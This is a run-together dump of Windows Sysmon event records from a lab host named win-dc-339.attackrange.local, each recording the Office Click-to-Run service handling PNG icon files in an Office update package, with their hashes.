Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@4x.pngMD5=2C905FDFEB998482E19691CCFA629FC6,SHA256=E1C924C3DEE911774EA1C95A293547C7C7559400755CA91EB2515413C0DB25E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@3x.pngMD5=8167F392A772C89051A0295B099D2FBB,SHA256=EF17C6ADAECC0DF75F8D8A8D368F489E383ACC09A7AC712185DD82BBA5389005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark@2x.pngMD5=F31B080F4BC88F2BDACE35EE08A4E4D0,SHA256=3F26ECA29F247B440DDB6DB0CFBBE161B6EEADE1698FC69CEC54AFE4C4C14EC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-checkmark.pngMD5=8846E482CC4E931A90C5CE6C4E9159EF,SHA256=243AB60A77E796EA1497E657DD3C899D1955E8A4D2350844DA90C099C171A225,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable@4x.pngMD5=642B4E640ED88F2CD1EB130B72C545B7,SHA256=B5A253E98FD700F360DD221361361F2F3602E7F6B84C99C572A651EA4D8BE98A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable@3x.pngMD5=6D7A172EF8F4DB22A38E21C5C476FA4F,SHA256=F88D0C87966475D8A8B9F2F71E166C1F6C89118D95E274831146C955AFC40554,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable@2x.pngMD5=E3158261B6015DEB8A26BBC0BC7C6C60,SHA256=D84BC9CF30F1EFEB115C00F592C4915E96D6571E9438D8B6D5B06D40C29B033A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable.pngMD5=9052DB248FEDB37B82897E37CCD1DE26,SHA256=308036E80E1A90CF35160D9AA7116A6CA2D32C55B3666885108B0EF094700B51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark@4x.pngMD5=EB3F60D32526DCCD0BBE5A36431B8EAE,SHA256=3114512FBFF2B05A10988E34D93993573CF6CF3C11B9A054BA7C756EDFBAF347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark@3x.pngMD5=6691C021E37817EDA4DAD76675FD30DC,SHA256=590548A182FBA7B70647289238CEE26C942361FA670EE9DBC469CE63C5A9E600,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark@2x.pngMD5=8E8AA56B646CECB71009ED4E0CEDD3BB,SHA256=57FD5B011D069ADB3E865365868CB286A58BC628D559FE2D0B4124066160FCE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-addtotable-dark.pngMD5=36C49CB1ED04BE4B61881EC9E09FFEA1,SHA256=F6F3E690C5FB375E4B404707EBCB69A3B9D0B473172BC302CB76E79F02D4727D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow@4x.pngMD5=58CDE19BCA337B44202B259399DC974B,SHA256=8A4325770945E92F11D197D67CED146A4BD8751C182EC0A8DC2FF161CCC81CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow@3x.pngMD5=94DF690EEF2B2733949D2D891E603A67,SHA256=0F6A76878431A60100F5314656028440C21E306383BB2235E9633E83634116BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow@2x.pngMD5=9E66F8E0DA2902EC2E41D3AE2B967712,SHA256=941AEBD01579923F5C5E843D57C90CDA5C08B76AD149C4AD145424AB523C9D1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow.pngMD5=BA91BCA75C6DFB6217A1DD68EFD14DFF,SHA256=C5D2624BEA1264F5B1DDA2CEF09826776B6C6D434715E58FCC7E9F992A593479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow-dark@4x.pngMD5=F1B608F56F5561063735B74909E852F0,SHA256=78BC2E51834D9C3FCC20B388F940F5DC0CB7FA46EC0CF5E2616A693B8D7DBC05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow-dark@3x.pngMD5=2E908DBBCC78AF9D52159CBE5C93D182,SHA256=FC08120DE6C40C844ED4BA196ABBE124FDEF61B875AD8691DA52E8A5BA48DED5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow-dark@2x.pngMD5=99BA37D541895758DA728084CC385E6D,SHA256=00B6E9C5A909E5FF98BA5CAEE637812F186720D7DC70FCC5B3C5457DA040D9C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-overflow-dark.pngMD5=C12FCFA6DDA236C0EF1DEF5F7AA8D4C6,SHA256=CF05461C0107AAE165156200985BE6BC794AAE9C958A03BA22E95D7E97532DDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret@4x.pngMD5=69521D2C09E9DB51696A49CA25FA0E37,SHA256=C5FDD8C18F50C9C38EBCABE74C6B9D228B6FEAFB3B1E3E0B2AAC9EB0626E8F08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret@3x.pngMD5=FA13379BF4DF2E23732E0E3C0EB9EA0D,SHA256=CD162095B249EB3A1155515BFEB1F9759194A6C9D66E68C560A1491AFB16360E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret@2x.pngMD5=EFC72B3F4630B36E5C9BD86A66B650DB,SHA256=BB696CBE2D4C0308F5AAB7B33042EBADDE316E56FED56C5935D452F445154546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret.pngMD5=A414AB6B674E064E5C4978B364C32274,SHA256=4DFE646EA31353DB08C989A9A8D8D3199B9DDD66672F1B9BB5289848127F034F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl@4x.pngMD5=C52E25424F6974BD361DFE8B5F03236B,SHA256=2889231C756157208710179F27E33EF21E61135DF7F9DCBCC1C1490574B273E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl@3x.pngMD5=CCF7FCE4F0B3FC8566D199118D78F757,SHA256=7908CA137235C3101962E34468BD8D8FEED9D00833568A2BD57F6AAF6B1238B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl@2x.pngMD5=C6D3CC485EABBF2317BBDE17C1C96DD0,SHA256=3DAF92B827CE86D57EF5F599F70F0D590A2D2FD3689C0EB93C3088DE08DEC5A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl.pngMD5=0298A111988F12D2768E372D06DBA5C3,SHA256=A6C14C80838178402CD8EAE9EC6C55965A62494B229CA1EFB5E9070AE0C1C5D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl-dark@4x.pngMD5=C2C7C7E5F3EA9C79E14DE82F48F822B3,SHA256=158D035FB74714BC46C004B3F1DABE72993880568B68E55B2FE235E568B53183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl-dark@3x.pngMD5=4C1C92B0B7606442035030E8554A04D8,SHA256=C78109AD0B40B1B2076737CA78691B8B011608ADC21EE3A3BBB5BDE3BDEBBAF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl-dark@2x.pngMD5=329A20D4B611802AF62E4EA0C782C954,SHA256=2846A2CE13A627E11871583942CC2859F5B374FA1403381563848B4F62A602EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-rtl-dark.pngMD5=8A53C12DBDB821DC2C3859B54B4F026D,SHA256=0D19976CB398A7E3C9C8E4147FCC241359C9FB1076CAB0A1C18C1D918D32B56B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-dark@4x.pngMD5=FDE643008235C2F1424E941380C99A8A,SHA256=2A837C3B9D7CC3EAB14996EA584B5F26E4803C3A70527E8E661E11AF548D567E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-dark@3x.pngMD5=BC3C87C7364A90FC000256F966C1597F,SHA256=64688EBF6FFA995C0C21F6EE69FB1C3CE5301EADF3BF4259BF7DC6B512B4838E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-dark@2x.pngMD5=FFED845F9778BAF39167F696E51994C3,SHA256=20FAD447B26D1B3A044B4996CD4CF24EDD98FF137B35C89C72DAEB97C48AB942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-caret-dark.pngMD5=A97AE6341655FA910866CAC2266F955F,SHA256=4291969D5C5AC96B12661A11590AA165571C3910FF51263A51292ED9E2023F17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow@4x.pngMD5=BB4030DBFBBC84D00D2BA51A84F4A58D,SHA256=01ED2668A3277DEB57001B16FE77D282FF34AF9AC561FFF636E95EEFE0293843,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow@3x.pngMD5=D8F52A21BAA0009E2F13911C9124374F,SHA256=4EF1A7BC39F6A34061708A3210919FC8D712866EF96A71EACE1FD552FD897C86,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow@2x.pngMD5=7139CDC778C0A9830A72336AEFC0C8BD,SHA256=5DC150CB2D8E3E30D77715063D7D87183395DF78BEF49A8A133CAC4D94965A1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow.pngMD5=1D75B96E448B830F754B8FA98A9BFE05,SHA256=39631416CE736D7AEDA1A4D5ECC81D3EBBC526207EF6F94B82334FF76C374DD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl@4x.pngMD5=746468DA546CBFAD5A07A5F7AB781C36,SHA256=72639406C7A3EA64B4422509D8BB68244D26873C0429856CB7C160288F26172C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl@3x.pngMD5=F01D87871097DAD788F772F245F97871,SHA256=51C3CEA54A3D3AAB92756B6CD063FBB2C78F11DD06D36BADC6215A851406C708,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 